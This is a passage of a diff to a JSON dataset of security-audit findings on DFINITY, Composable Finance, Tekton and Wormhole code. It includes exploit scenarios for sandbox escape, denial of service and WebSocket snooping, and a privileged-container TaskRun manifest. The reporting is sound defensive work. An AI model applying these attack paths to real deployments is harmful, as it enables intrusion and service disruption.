process. By exploiting a vulnerability in the kernel, it is able to break out of the sandbox and execute arbitrary code on the node. Recommendations Long term, consider using Seccomp-BPF to restrict the system calls available to a sandboxed process. Extra care must be taken when the canister sandbox (or any of its dependencies) is updated to ensure that the set of system calls invoked during normal execution has not changed.", + "title": "18. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The Composable Finance contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-js causes a security vulnerability in the Composable Finance contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "5. Invalid system state changes cause the replica to panic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", - "body": "When a sandboxed process has completed an execution request, the hypervisor calls SystemStateChanges::apply_changes (in Hypervisor::execute) to apply the system state changes to the global canister system state. pub fn apply_changes(self, system_state: &mut SystemState) { // Verify total cycle change is not positive and update cycles balance. assert!(self.cycle_change_is_valid( system_state.canister_id == CYCLES_MINTING_CANISTER_ID )); self.cycles_balance_change .apply_ref(system_state.balance_mut()); // Observe consumed cycles. system_state .canister_metrics .consumed_cycles_since_replica_started += NominalCycles::from_cycles(self.cycles_consumed); // Verify we don't accept more cycles than are available from each call // context and update each call context balance if !self.call_context_balance_taken.is_empty() { let call_context_manager = system_state.call_context_manager_mut().unwrap(); for (context_id, amount_taken) in &self.call_context_balance_taken { let call_context = call_context_manager .call_context_mut(*context_id) .expect(\"Canister accepted cycles from invalid call context\"); call_context .withdraw_cycles(*amount_taken) .expect(\"Canister accepted more cycles than available ...\"); } } // Push outgoing messages. for msg in self.requests { system_state .push_output_request(msg) .expect(\"Unable to send new request\"); } // Verify new certified data isn't too long and set it. if let Some(certified_data) = self.new_certified_data.as_ref() { assert!(certified_data.len() <= CERTIFIED_DATA_MAX_LENGTH as usize); system_state.certified_data = certified_data.clone(); } // Verify callback ids and register new callbacks. for update in self.callback_updates { match update { CallbackUpdate::Register(expected_id, callback) => { let id = system_state .call_context_manager_mut() .unwrap() .register_callback(callback); assert_eq!(id, expected_id); } CallbackUpdate::Unregister(callback_id) => { let _callback = system_state .call_context_manager_mut() .unwrap() .unregister_callback(callback_id) .expect(\"Tried to unregister callback with an id ...\"); } } } } Figure 5.1: system_api/src/sandbox_safe_system_state.rs:99-157 The apply_changes method uses assert and expect to ensure that system state invariants involving cycle balances, call contexts, and callback updates are upheld. By sending a WebAssembly (Wasm) execution output with invalid system state changes, a compromised sandboxed process could use this to cause the replica to panic. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. The canister sends a Wasm execution output message containing invalid state changes to the replica, which causes the replica process to panic, crashing the entire subnet. Recommendations Short term, revise SystemStateChanges::apply_changes so that it returns an error if the system state changes from a sandboxed process are found to be invalid. Long term, audit the codebase for the use of panicking functions and macros like assert, unreachable, unwrap, or expect in code that validates data from untrusted sources.", + "title": "19. Lack of contract documentation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The codebases lack code documentation, high-level descriptions, and examples, making the contracts dicult to review and increasing the likelihood of user mistakes. The CrosslayerPortal codebase would benet from additional documentation, including on the following: The logic responsible for setting the roles in the core and the reason for the manipulation of indexes The incoming function arguments and the values used on source chains and destination chains The arithmetic involved in reward calculations and the relayers distribution of tokens The checks performed by the o-chain components, such as the relayer and the rebalancing bot The third-party integrations The rebalancing arithmetic and calculations There should also be clear NatSpec documentation on every function, identifying the unit of each variable, the functions intended use, and the functions safe values. The documentation should include all expected properties and assumptions relevant to the aforementioned aspects of the codebase. Recommendations Short term, review and properly document the aforementioned aspects of the codebase. Long term, consider writing a formal specication of the protocol.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "6. SandboxedExecutionController does not enforce memory size invariants ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", - "body": "When a sandboxed process has completed an execution request, the execution state is updated by the SandboxedExecutionController::process method with the data from the execution output. // Unless execution trapped, commit state (applying execution state // changes, returning system state changes to caller). let system_state_changes = if exec_output.wasm.wasm_result.is_ok() { if let Some(state_modifications) = exec_output.state { // TODO: If a canister has broken out of wasm then it might have allocated // more wasm or stable memory than allowed. We should add an additional // check here that the canister is still within its allowed memory usage. execution_state .wasm_memory .page_map .deserialize_delta(state_modifications.wasm_memory.page_delta); execution_state.wasm_memory.size = state_modifications.wasm_memory.size; execution_state.wasm_memory.sandbox_memory = SandboxMemory::synced( wrap_remote_memory(&sandbox_process, next_wasm_memory_id), ); execution_state .stable_memory .page_map .deserialize_delta(state_modifications.stable_memory.page_delta); execution_state.stable_memory.size = state_modifications.stable_memory.size; execution_state.stable_memory.sandbox_memory = SandboxMemory::synced( wrap_remote_memory(&sandbox_process, next_stable_memory_id), ); // ... state_modifications.system_state_changes } else { SystemStateChanges::default() } } else { SystemStateChanges::default() }; Figure 6.1: replica_controller/src/sandboxed_execution_controller.rs:663 However, the code does not validate the Wasm and stable memory sizes against the corresponding page maps. This means that a compromised sandbox could report a Wasm or stable memory size of 0 along with a non-empty page map. Since these memory sizes are used to calculate the total memory used by the canister in ExecutionState::memory_usage, this lack of validation could allow the canister to use up cycles normally reserved for memory use. pub fn memory_usage(&self) -> NumBytes { // We use 8 bytes per global. let globals_size_bytes = 8 * self.exported_globals.len() as u64; let wasm_binary_size_bytes = self.wasm_binary.binary.len() as u64; num_bytes_try_from(self.wasm_memory.size) .expect(\"could not convert from wasm memory number of pages to bytes\") + num_bytes_try_from(self.stable_memory.size) .expect(\"could not convert from stable memory number of pages to bytes\") + NumBytes::from(globals_size_bytes) + NumBytes::from(wasm_binary_size_bytes) } Figure 6.2: replicated_state/src/canister_state/execution_state.rs:411421 Canister memory usage aects how much the cycles account manager charges the canister for resource allocation. If the canister uses best-eort memory allocation, the implementation calls through to ExecutionState::memory_usage to compute how much memory the canister is using. pub fn charge_canister_for_resource_allocation_and_usage( &self, log: &ReplicaLogger, canister: &mut CanisterState, duration_between_blocks: Duration, ) -> Result<(), CanisterOutOfCyclesError> { let bytes_to_charge = match canister.memory_allocation() { // The canister has explicitly asked for a memory allocation. MemoryAllocation::Reserved(bytes) => bytes, // The canister uses best-effort memory allocation. MemoryAllocation::BestEffort => canister.memory_usage(self.own_subnet_type), }; if let Err(err) = self.charge_for_memory( &mut canister.system_state, bytes_to_charge, duration_between_blocks, ) { } // ... // ... } Figure 6.3: cycles_account_manager/src/lib.rs:671 Thus, if a sandboxed process reports a lower memory usage, the cycles account manager will charge the canister less than it should. It is unclear whether this represents expected behavior when a canister breaks out of the Wasm execution environment. Clearly, if the canister is able to execute arbitrary code in the context of a sandboxed process, then the replica has lost all ability to meter and restrict canister execution, which means that accounting for canister cycle and memory use is largely meaningless. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. The canister reports the wrong memory sizes back to the replica with the execution output. This causes the cycles account manager to miscalculate the remaining available cycles for the canister in the charge_canister_for_resource_allocation_and_usage method. Recommendations Short term, document this behavior and ensure that implicitly trusting the canister output could not adversely aect the replica or other canisters running on the system. Consider enforcing the correct invariants for memory allocations reported by a sandboxed process. The following invariant should always hold for Wasm and stable memory: page_map_size <= memory.size <= MAX_SIZE page_map_size could be computed as memory.page_map.num_host_pages() * PAGE_SIZE.", + "title": "21. Unnecessary complexity due to interactions with native and smart contract tokens ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The Composable Finance code is needlessly complex and has excessive branching. Its complexity largely results from the integration of both ERC20s and native tokens (i.e., ether). Creating separate functions that convert native tokens to ERC20s and then interact with functions that must receive ERC20 tokens (i.e., implementing separation of concerns) would drastically simplify and optimize the code. This complexity is the source of many bugs and increases the gas costs for all users whether or not they need to distinguish between ERC20s and ether. It is best practice to make components as small as possible and to separate helpful but noncritical components into periphery contracts. This reduces the attack surface and improves readability. Figure 21.1 shows an example of complex code. if (tempData.isSlp) { IERC20(sushiConfig.slpToken()).safeTransfer( msg.sender , tempData.slpAmount ); [...] } else { //unwrap and send the right asset [...] if (tempData.isEth) { [...] } else { IERC20(sushiConfig.wethToken()).safeTransfer( Figure 21.1: Part of the withdraw function in SushiSlpStrategy.sol:L180-L216 Recommendations Short term, remove the native ether interactions and use WETH instead. Long term, minimize the function complexity by breaking functions into smaller units. Additionally, refactor the code with minimalism in mind and extend the core functionality into periphery contracts.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2060,71 +4830,69 @@ ] }, { - "title": "1. The use of time.After() in select statements can lead to memory leaks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "Calls to time.After in for/select statements can lead to memory leaks because the garbage collector does not clean up the underlying Timer object until the timer res. A new timer, which requires resources, is initialized at each iteration of the for loop (and, hence, the select statement). As a result, many routines originating from the time.After call could lead to overconsumption of the memory. for { select { case <-ctx.Done(): // When the context is cancelled, stop reporting. return case <-time.After(r.ReportingPeriod): // Every 30s surface a metric for the number of running pipelines. if err := r.RunningPipelineRuns(lister); err != nil { logger.Warnf(\"Failed to log the metrics : %v\", err) } Figure 1.1: tektoncd/pipeline/pkg/pipelinerunmetrics/metrics.go#L290-L300 for { select { case <-ctx.Done(): // When the context is cancelled, stop reporting. return case <-time.After(r.ReportingPeriod): // Every 30s surface a metric for the number of running tasks. if err := r.RunningTaskRuns(lister); err != nil { logger.Warnf(\"Failed to log the metrics : %v\", err) } } Figure 1.2: pipeline/pkg/taskrunmetrics/metrics.go#L380-L391 Exploit Scenario An attacker nds a way to overuse a function, which leads to overconsumption of the memory and causes Tekton Pipelines to crash. Recommendations Short term, consider refactoring the code that uses the time.After function in for/select loops using tickers. This will prevent memory leaks and crashes caused by memory exhaustion. Long term, ensure that the time.After method is not used in for/select routines. Periodically use the Semgrep query to check for and detect similar patterns. References Use with caution time.After Can cause memory leak (golang) Golang <-time.After() is not garbage collected before expiry", + "title": "29. Use of legacy openssl version in CrosslayerPortal tests ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The CrosslayerPortal project uses a legacy version of openssl to run tests. While this version is not exposed in production, the use of outdated security protocols may be risky (gure 29.1). An unexpected error occurred: Error: error:0308010C:digital envelope routines::unsupported at new Hash (node:internal/crypto/hash:67:19) at Object.createHash (node:crypto:130:10) at hash160 (~/CrosslayerPortal/node_modules/ethereum-cryptography/vendor/hdkey-without-crypto.js:249:21 ) at HDKey.set (~/CrosslayerPortal/node_modules/ethereum-cryptography/vendor/hdkey-without-crypto.js:50:24) at Function.HDKey.fromMasterSeed (~/CrosslayerPortal/node_modules/ethereum-cryptography/vendor/hdkey-without-crypto.js:194:20 ) at deriveKeyFromMnemonicAndPath (~/CrosslayerPortal/node_modules/hardhat/src/internal/util/keys-derivation.ts:21:27) at derivePrivateKeys (~/CrosslayerPortal/node_modules/hardhat/src/internal/core/providers/util.ts:29:52) at normalizeHardhatNetworkAccountsConfig (~/CrosslayerPortal/node_modules/hardhat/src/internal/core/providers/util.ts:56:10) at createProvider (~/CrosslayerPortal/node_modules/hardhat/src/internal/core/providers/construction.ts:78:59) at ~/CrosslayerPortal/node_modules/hardhat/src/internal/core/runtime-environment.ts:80:28 { opensslErrorStack: [ 'error:03000086:digital envelope routines::initialization error' ], library: 'digital envelope routines', reason: 'unsupported', code: 'ERR_OSSL_EVP_UNSUPPORTED' } Figure 29.1: Errors agged in npx hardhat testing Recommendations Short term, refactor the code to use a new version of openssl to prevent the exploitation of openssl vulnerabilities. Long term, avoid using outdated or legacy versions of dependencies. 22. Commented-out and unimplemented conditional statements Severity: Undetermined Diculty: Low Type: Undened Behavior Finding ID: TOB-CMP-22 Target: apyhunter-tricrypto/contracts/sushiswap/SushiSlpStrategy.sol", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High", - "Severity: Low", - "Difficulty: High" + "Severity: Informational", + "Difficulty: N/A" ] }, { - "title": "2. Risk of resource exhaustion due to the use of defer inside a loop ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "The ExecuteInterceptors function runs all interceptors congured for a given trigger inside a loop. The res.Body.Close() function is deferred at the end of the loop. Calling defer inside of a loop could cause resource exhaustion conditions because the deferred function is called when the function exits, not at the end of each loop. As a result, resources from each interceptor object are accumulated until the end of the for statement. While this may not cause noticeable issues in the current state of the application, it is best to call res.Body.Close() at the end of each loop to prevent unforeseen issues. func (r Sink) ExecuteInterceptors(trInt []*triggersv1.TriggerInterceptor, in *http.Request, event []byte, log *zap.SugaredLogger, eventID string, triggerID string, namespace string, extensions map[string]interface{}) ([]byte, http.Header, *triggersv1.InterceptorResponse, error) { if len(trInt) == 0 { return event, in.Header, nil, nil } // (...) for _, i := range trInt { if i.Webhook != nil { // Old style interceptor // (...) defer res.Body.Close() Figure 2.1: triggers/pkg/sink/sink.go#L428-L469 Recommendations Short term, rather than deferring the call to res.Body.Close(), add a call to res.Body.Close() at the end of the loop.", + "title": "23. Error-prone NFT management in the Summoner contract ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The Summoner contracts ability to hold NFTs in a number of states may create confusion regarding the contracts states and the dierences between the contracts. For instance, the Summoner contract can hold the following kinds of NFTs: NFTs that have been pre-minted by Composable Finance and do not have metadata attached to them Original NFTs that have been locked by the Summoner for minting on the destination chain MosaicNFT wrapper tokens, which are copies of NFTs that have been locked and are intended to be minted on the destination chain As the system is scaled, the number of NFTs held by the Summoner , especially the number of pre-minted NFTs, will increase signicantly. Recommendations Simplify the NFT architecture; see the related recommendations in Appendix E .", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Low" ] }, { - "title": "3. Lack of access controls for Tekton Pipelines API ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "The Tekton Pipelines extension uses an API to process requests for various tasks such as listing namespaces and creating TaskRuns. While Tekton provides documentation on enabling OAuth2 authentication, the API is unauthenticated by default. Should a Tekton operator expose the dashboard for other users to monitor their own deployments, every API method would be available to them, allowing them to perform tasks on namespaces that they do not have access to. Figure 3.1: Successful unauthenticated request Exploit Scenario An attacker discovers the endpoint exposing the Tekton Pipelines API and uses it to perform destructive tasks such as deleting PipelineRuns. Furthermore, the attacker can discover potentially sensitive information pertaining to deployments congured in Tekton. Recommendations Short term, add documentation on securing access to the API using Kubernetes security controls, including explicit documentation on the security implications of exposing access to the dashboard and, therefore, the API. Long term, add an access control mechanism for controlling who can access the API and limiting access to namespaces as needed and/or possible. 4. Insu\u0000cient validation of volumeMounts paths Severity: Informational Diculty: Low Type: Data Validation Finding ID: TOB-TKN-4 Target: Various", + "title": "1. Lack of doc comments ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "Publicly accessible functions within the governor and watcher code generally lack doc comments. Inadequately documented code can be misunderstood, which increases the likelihood of an improper bug x or a mis-implemented feature. There are ten publicly accessible functions within governor.go. However, only one such function has a comment preceding it (see gure 1.1). // Returns true if the message can be published, false if it has been added to the pending list. func (gov *ChainGovernor) ProcessMsg(msg *common.MessagePublication) bool { Figure 1.1: node/pkg/governor/governor.go#L281L282 Similarly, there are at least 28 publicly accessible functions among the non-evm watchers. However, only seven of them are preceded by doc comments, and only one of the seven is not in the Near watcher code (see gure 1.2). // GetLatestFinalizedBlockNumber() returns the latest published block. func (s *SolanaWatcher) GetLatestFinalizedBlockNumber() uint64 { Figure 1.2: node/pkg/watchers/solana/client.go#L846L847 Gos ocial documentation on doc comments states the following: A funcs doc comment should explain what the function returns or, for functions called for side eects, what it does. Exploit Scenario Alice, a Wormhole developer, implements a new node feature involving the governor. Alice misunderstands how the functions called by her new feature work. Alice introduces a vulnerability into the node as a result. Recommendations Short term, add doc comments to each function that are accessible from outside of the package in which the function is dened. This will facilitate code review and reduce the likelihood that a developer introduces a bug into the code because of a misunderstanding. Long term, regularly review code comments to ensure they are accurate. Documentation must be kept up to date to be benecial. References Go Doc Comments", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Medium" + "Difficulty: High" ] }, { - "title": "5. Missing validation of Origin header in WebSocket upgrade requests ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "Tekton Dashboard uses the WebSocket protocol to provide real-time updates for TaskRuns, PipelineRuns, and other Tekton data. The endpoints responsible for upgrading the incoming HTTP request to a WebSocket request do not validate the Origin header to ensure that the request is coming from a trusted origin (i.e., the dashboard itself). As a result, arbitrary malicious web pages can connect to Tekton Dashboard and receive these real-time updates, which may include sensitive information, such as the log output of TaskRuns and PipelineRuns. Exploit Scenario A user hosts Tekton Dashboard on a private address, such as one in a local area network or a virtual private network (VPN), without enabling application-layer authentication. An attacker identies the URL of the dashboard instance (e.g., http://192.168.3.130:9097) and hosts a web page with the following content: Figure 5.1: A malicious web page that extracts Tekton Dashboard WebSocket updates The attacker convinces the user to visit the web page. Upon loading it, the users browser successfully connects to the Tekton Dashboard WebSocket endpoint for monitoring PipelineRuns and logs received messages to the JavaScript console. As a result, the attackers untrusted web origin now has access to real-time updates from a dashboard instance on a private network that would otherwise be inaccessible outside of that network. Figure 5.2: The untrusted origin http://localhost:8080 has access to Tekton Dashboard WebSocket messages. Recommendations Short term, modify the code so that it veries that the Origin header of WebSocket upgrade requests corresponds to the trusted origin on which Tekton Dashboard is served. For example, if the origin is not http://192.168.3.130:9097, Tekton Dashboard should reject the incoming request. 6. Import resources feature does not validate repository URL scheme Severity: Informational Diculty: Low Type: Data Validation Finding ID: TOB-TKN-6 Target: Dashboard", + "title": "2. Fields protected by mutex are not documented ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "The elds protected by the governors mutex are not documented. A developer adding functionality to the governor is unlikely to know whether the mutex must be locked for their application. The ChainGovernor struct appears in gure 2.1. The Wormhole Foundation communicated to us privately that the mutex protects the elds highlighted in yellow. Note that, because there are 13 elds in ChainGovernor (not counting the mutex itself), the likelihood of a developer guessing exactly the set of highlighted elds is small. type ChainGovernor struct { db logger mutex tokens tokensByCoinGeckoId chains msgsSeen db.GovernorDB *zap.Logger sync.Mutex map[tokenKey]*tokenEntry map[string][]*tokenEntry map[vaa.ChainID]*chainEntry map[string]bool // Key is hash, payload is consts transferComplete and transferEnqueued. []*common.MessagePublication int string int msgsToPublish dayLengthInMinutes coinGeckoQuery env nextStatusPublishTime time.Time nextConfigPublishTime time.Time statusPublishCounter int64 configPublishCounter int64 } Figure 2.1: node/pkg/governor/governor.go#L119L135 Exploit Scenario Alice, a Wormhole developer, adds a new function to the governor. Case 1: Alice does not lock the mutex, believing that her function operates only on elds that are not protected by the mutex. However, by not locking the mutex, Alice introduces a race condition into the governor. Case 2: Alice locks the mutex just to be safe. However, the elds on which Alices function operates are not protected by the mutex. Alice introduces a deadlock into the code as a result. Recommendations Short term, document the elds within ChainGovernor that are protected by the mutex. This will reduce the likelihood that a developer incorrectly locks, or does not lock, the mutex. Long term, regularly review code comments to ensure they are accurate. Documentation must be kept up to date to be benecial.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "8. Tekton allows users to create privileged containers ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "Tekton allows users to dene task and sidecar objects with a privileged security context, which eectively grants task containers all capabilities. Tekton operators can use admission controllers to disallow users from using this option. However, information on this mitigation in the guidance documents for Tekton Pipelines is insucient and should be made clear. If an attacker gains code execution on any of these containers, the attacker could break out of it and gain full access to the host machine. We were not able to escape step containers running in privileged mode during the time allotted for this audit. apiVersion: tekton.dev/v1beta1 kind: TaskRun metadata: name: build-push-secret-10 spec: serviceAccountName: build-bot taskSpec: steps: - name: secret securityContext: privileged: true image: ubuntu script: | #!/usr/bin/env bash sleep 20m Figure 8.1: TaskRun denition with the privileged security context root@build-push-secret-10-pod:/proc/fs# find -type f -maxdepth 5 -writable find: warning: you have specified the global option -maxdepth after the argument -type, but global options are not positional, i.e., -maxdepth affects tests specified before it as well as those specified after it. Please specify global options before other arguments. ./xfs/xqm ./xfs/xqmstat ./cifs/Stats ./cifs/cifsFYI ./cifs/dfscache ./cifs/traceSMB ./cifs/DebugData ./cifs/open_files ./cifs/SecurityFlags ./cifs/LookupCacheEnabled ./cifs/LinuxExtensionsEnabled ./ext4/vda1/fc_info ./ext4/vda1/options ./ext4/vda1/mb_groups ./ext4/vda1/es_shrinker_info ./jbd2/vda1-8/info ./fscache/stats Figure 8.2: With the privileged security context in gure 8.1, it is now possible to write to several les in /proc/fs, for example. Exploit Scenario A malicious developer runs a TaskRun with a privileged security context and obtains shell access to the container. Using one of various known exploits, he breaks out of the container and gains root access on the host. Recommendations Short term, create clear, easy-to-locate documentation warning operators about allowing developers and other users to dene a privileged security context for step containers, and include guidance on how to restrict such a feature. 9. Insu\u0000cient default network access controls between pods Severity: Medium Diculty: High Type: Conguration Finding ID: TOB-TKN-9 Target: Pipelines", + "title": "3. Potential nil pointer dereference in reloadPendingTransfer ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "A potential nil pointer dereference exists in reloadPendingTransfer. The bug could be triggered if invalid data were stored within a nodes database, and could make it impossible to restart the node. The relevant code appears in gures 3.1 and 3.2 When DecodeTransferPayloadHdr returns an error, the payload that is also returned is used to construct the error message (gure 3.1). However, as shown in gure 3.2, the returned payload can be nil. payload, err := vaa.DecodeTransferPayloadHdr(msg.Payload) if err != nil { gov.logger.Error(\"cgov: failed to parse payload for reloaded pending transfer, dropping it\", zap.String(\"MsgID\", msg.MessageIDString()), zap.Stringer(\"TxHash\", msg.TxHash), zap.Stringer(\"Timestamp\", msg.Timestamp), zap.Uint32(\"Nonce\", msg.Nonce), zap.Uint64(\"Sequence\", msg.Sequence), zap.Uint8(\"ConsistencyLevel\", msg.ConsistencyLevel), zap.Stringer(\"EmitterChain\", msg.EmitterChain), zap.Stringer(\"EmitterAddress\", msg.EmitterAddress), zap.Stringer(\"tokenChain\", payload.OriginChain), zap.Stringer(\"tokenAddress\", payload.OriginAddress), zap.Error(err), ) return } Figure 3.1: node/pkg/governor/governor_db.go#L90L106 func DecodeTransferPayloadHdr(payload []byte) (*TransferPayloadHdr, error) { if !IsTransfer(payload) { return nil, fmt.Errorf(\"unsupported payload type\") } Figure 3.2: sdk/vaa/structs.go#L962L965 Exploit Scenario Eve nds a code path that allows her to store erroneous payloads within the database of Alices node. Alice is unable to restart her node, as it tries to dereference a nil pointer on each attempt. Recommendations Short term, either eliminate the use of payload when constructing the error message, or verify that the payload is not nil before attempting to dereference it. This will eliminate a potential nil pointer dereference. Long term, add tests to exercise additional error paths within governor_db.go. This could help to expose bugs like this one.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: Low", + "Difficulty: High" ] }, { - "title": "11. Lack of rate-limiting controls ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "Tekton Dashboard does not enforce rate limiting of HTTP requests. As a result, we were able to issue over a thousand requests in just over a minute. Figure 11.1: We sent over a thousand requests to Tekton Dashboard without being rate limited. Processing requests sent at such a high rate can consume an inordinate amount of resources, increasing the risk of denial-of-service attacks through excessive resource consumption. In particular, we were able to create hundreds of running import resources pods that were able to consume nearly all the hosts memory in the span of a minute. Exploit Scenario An attacker oods a Tekton Dashboard instance with HTTP requests that execute pipelines, leading to a denial-of-service condition. Recommendations Short term, implement rate limiting on all API endpoints. Long term, run stress tests to ensure that the rate limiting enforced by Tekton Dashboard is robust.", + "title": "4. Unchecked type assertion in queryCoinGecko ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "The code that processes CoinGecko responses contains an unchecked type assertion. The bug is triggered when CoinGecko returns invalid data, and could be exploited for denial of service (DoS). The relevant code appears in gure 4.1. The data object that is returned as part of CoinGeckos response to a query is cast to a map m of type map[string]interface{} (yellow). However, the casts success is not veried. As a result, a nil pointer dereference can occur when m is accessed (red). m := data.(map[string]interface{}) if len(m) != 0 { var ok bool price, ok = m[\"usd\"].(float64) if !ok { to configured price for this token\", zap.String(\"coinGeckoId\", coinGeckoId)) gov.logger.Error(\"cgov: failed to parse coin gecko response, reverting // By continuing, we leave this one in the local map so the price will get reverted below. continue } } Figure 4.1: node/pkg/governor/governor_prices.go#L144L153 Note that if the access to m is successful, the resulting value is cast to a float64. In this case, the casts success is veried. A similar check should be performed for the earlier cast. Exploit Scenario Eve, a malicious insider at CoinGecko, sends invalid data to Wormhole nodes, causing them to crash. Recommendations Short term, in the code in gure 4.1, verify that the cast in yellow is successful by adding a check similar to the one highlighted in green. This will eliminate the possibility of a node crashing because CoinGecko returns invalid data. Long term, consider enabling the forcetypeassert lint in CI. This bug was initially agged by that lint, and then conrmed by our queryCoinGecko response fuzzer. Enabling the lint could help to expose additional bugs like this one.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: High" ] }, { - "title": "12. Lack of maximum request and response body constraint ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "The ioutil.ReadAll function reads from source until an error or an end-of-le (EOF) condition occurs, at which point it returns the data that it read. This function is used in dierent les of the Tekton Triggers and Tekton Pipelines codebases to read requests and responses. There is no limit on the maximum size of request and response bodies, so using ioutil.ReadAll to parse requests and responses could cause a denial of service (due to insucient memory). A denial of service could also occur if an exhaustive resource is loaded multiple times. This method is used in the following locations of the codebase: File pkg/remote/oci/resolver.go:L211 pkg/sink/sink.go:147,465 Project Pipelines Triggers pkg/interceptors/webhook/webhook.go:77 Triggers pkg/interceptors/interceptors.go:176 Triggers pkg/sink/validate_payload.go:29 cmd/binding-eval/cmd/root.go:141 cmd/triggerrun/cmd/root.go:182 Triggers Triggers Triggers Recommendations Short term, place a limit on the maximum size of request and response bodies. For example, this limit can be implemented by using the io.LimitReader function. Long term, place limits on request and response bodies globally in other places within the application to prevent denial-of-service attacks.", + "title": "5. Governor relies on a single external source of truth for asset prices ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "The governor relies on a single external source (CoinGecko) for asset prices, which could enable an attacker to transfer more than they would otherwise be allowed. The governor fetches an assets price from CoinGecko, compares the price to a hard-coded default, and uses whichever is larger (gure 5.1). However, if an assets price were to grow much larger than the hard-coded default, the hard-coded default would essentially be meaningless, and CoinGecko would become the sole source of truth for the price of that asset. Such a situation could be problematic, for example, if the assets price were volatile and CoinGecko had trouble keeping up with the price changes. // We should use the max(coinGeckoPrice, configuredPrice) as our price for computing notional value. func (te tokenEntry) updatePrice() { if (te.coinGeckoPrice == nil) || (te.coinGeckoPrice.Cmp(te.cfgPrice) < 0) { te.price.Set(te.cfgPrice) } else { te.price.Set(te.coinGeckoPrice) } } Figure 5.1: node/pkg/governor/governor_prices.go#L205L212 Exploit Scenario Eve obtains a large quantity of AliceCoin from a hack. AliceCoins price is both highly volatile and much larger than what was hard-coded in the last Wormhole release. CoinGecko has trouble keeping up with the current price of AliceCoin. Eve identies a point in time when the price that CoinGecko reports is low (but still higher than the hard-coded default). Eve uses the opportunity to move more of her maliciously obtained AliceCoin than Wormhole would allow if CoinGecko had reported the correct price. Recommendations Short term, monitor the price of assets supported by Wormhole. If the price of an asset increases substantially, consider issuing a release that takes into account the new price. This will help to avoid situations where CoinGecko becomes the sole source of truth of the price of an asset. Long term, incorporate additional price oracles besides CoinGecko. This will provide more robust protection than requiring a human to monitor prices and issue point releases.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2132,69 +4900,69 @@ ] }, { - "title": "3. Lack of access controls for Tekton Pipelines API ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "The Tekton Pipelines extension uses an API to process requests for various tasks such as listing namespaces and creating TaskRuns. While Tekton provides documentation on enabling OAuth2 authentication, the API is unauthenticated by default. Should a Tekton operator expose the dashboard for other users to monitor their own deployments, every API method would be available to them, allowing them to perform tasks on namespaces that they do not have access to. Figure 3.1: Successful unauthenticated request Exploit Scenario An attacker discovers the endpoint exposing the Tekton Pipelines API and uses it to perform destructive tasks such as deleting PipelineRuns. Furthermore, the attacker can discover potentially sensitive information pertaining to deployments congured in Tekton. Recommendations Short term, add documentation on securing access to the API using Kubernetes security controls, including explicit documentation on the security implications of exposing access to the dashboard and, therefore, the API. Long term, add an access control mechanism for controlling who can access the API and limiting access to namespaces as needed and/or possible.", + "title": "6. Potential resource leak ", + "html_url": 